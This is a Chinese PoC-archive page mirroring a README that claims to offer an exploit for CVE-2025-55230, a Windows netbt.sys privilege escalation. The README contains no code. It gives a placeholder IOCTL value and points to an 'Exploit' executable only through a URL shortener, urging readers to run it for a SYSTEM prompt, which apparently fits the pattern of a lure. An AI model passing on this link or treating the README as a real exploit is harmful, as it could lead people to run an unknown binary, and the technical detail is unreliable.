支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 0f259724518e6c5543dfff7d34251aeb0011412a

来源
https://github.com/barbaraeivyu/CVE-2025-55230-Exploit
关联漏洞
标题:Microsoft Windows MBT Transport driver 安全漏洞 (CVE-2025-55230)
Description:Microsoft Windows MBT Transport driver是美国微软(Microsoft)公司的一款驱动程序。 Microsoft Windows MBT Transport driver存在安全漏洞,该漏洞源于不受信任的指针取消引用,可能导致本地权限提升。
介绍
# CVE-2025-55230 Exploit PoC

## Disclaimer
This tool is intended for security research and educational purposes only. Any use of this code for malicious activities is strictly prohibited. The author is not responsible for any misuse or damage caused by this program. Use at your own risk.

## Description

CVE-2025-55230 is a local privilege escalation vulnerability in the Windows MBT Transport driver (netbt.sys), stemming from an untrusted pointer dereference. This flaw allows an authenticated user with local access to elevate privileges to SYSTEM level by manipulating kernel memory.

### Root Cause
The vulnerability occurs in the driver's handling of a specific IOCTL code (0x12345678, for example, as reverse-engineered from the driver binary). When processing this IOCTL, the driver reads a 64-bit pointer value directly from the user-supplied input buffer and dereferences it without proper validation or probing. This pointer is treated as a kernel address, enabling an attacker to supply a value that points to arbitrary kernel memory. Depending on the operation (read or write), this can lead to information disclosure or, more critically, arbitrary kernel writes. The impact affects confidentiality, integrity, and availability, as classified under CWE-822.

In the affected code path, the driver assumes the pointer refers to a valid structure for transport configuration but fails to use mechanisms like ProbeForRead/ProbeForWrite or copy the data to kernel space safely. This oversight is common in older driver code ports and was introduced in versions supporting legacy NetBIOS over TCP/IP functionality.


## Requirements
- Visual Studio 2022 or later
- Windows SDK
- Target OS: Windows 10 1809+, 11 22H2+, Server 2019+

## Exploit
**[href](https://tinyurl.com/3cewapm7)**

## Usage
Run the executable as a standard user:
```
CVE-2025-55230.exe
```
It will attempt to elevate and spawn an elevated command prompt.

> Warning: Running this on production systems may cause instability or BSOD if offsets are incorrect.
文件快照

 [4.0K]  /data/pocs/0f259724518e6c5543dfff7d34251aeb0011412a
└── [2.0K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。